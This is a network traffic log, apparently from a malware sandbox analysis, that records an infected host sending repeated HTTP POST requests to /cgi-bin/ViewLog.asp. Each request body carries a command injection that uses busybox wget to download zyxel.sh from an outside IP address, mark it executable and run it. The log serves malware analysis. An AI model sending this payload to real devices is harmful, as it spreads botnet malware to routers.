                                                              Nov 13, 2023 22:20:34.369355917 CET19139OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:40.512458086 CET19890OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:52.542884111 CET20680OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:16.859642029 CET20711OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              958192.168.2.235929894.121.25.1718080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:31.150191069 CET18758OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              959192.168.2.235367894.121.186.1798080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:31.152550936 CET18759OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              96192.168.2.234275085.208.123.1818080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:24.145483017 CET3059OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:24.488101959 CET3076INHTTP/1.0 400 Bad Request
                                                              Server: squid/3.1.23
                                                              Mime-Version: 1.0
                                                              Date: Mon, 13 Nov 2023 20:50:57 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 3169
                                                              X-Squid-Error: ERR_INVALID_URL 0
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              960192.168.2.234195094.120.241.1208080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:31.155957937 CET18760OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              961192.168.2.234110695.125.167.788080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:31.170320988 CET18760OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:31.619894028 CET18770INHTTP/1.0 404 NOT FOUND


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              962192.168.2.234237031.136.67.2208080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:31.462457895 CET18765OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:32.449521065 CET18900OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:34.433383942 CET19141OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:38.464700937 CET19647OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:46.399632931 CET20529OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:02.269629002 CET20696OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              963192.168.2.235397831.136.55.1358080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:31.462977886 CET18765OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:32.481492996 CET18901OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:34.465236902 CET19141OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:38.464699984 CET19646OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:46.399640083 CET20529OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:02.269623995 CET20696OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              964192.168.2.233757862.46.225.228080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:31.463371992 CET18766OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              965192.168.2.234153831.40.224.888080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:31.479234934 CET18767OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:31.823820114 CET18869INHTTP/1.0 400 Bad Request
                                                              Server: squid/3.1.23
                                                              Mime-Version: 1.0
                                                              Date: Mon, 13 Nov 2023 20:51:31 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 3169
                                                              X-Squid-Error: ERR_INVALID_URL 0
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 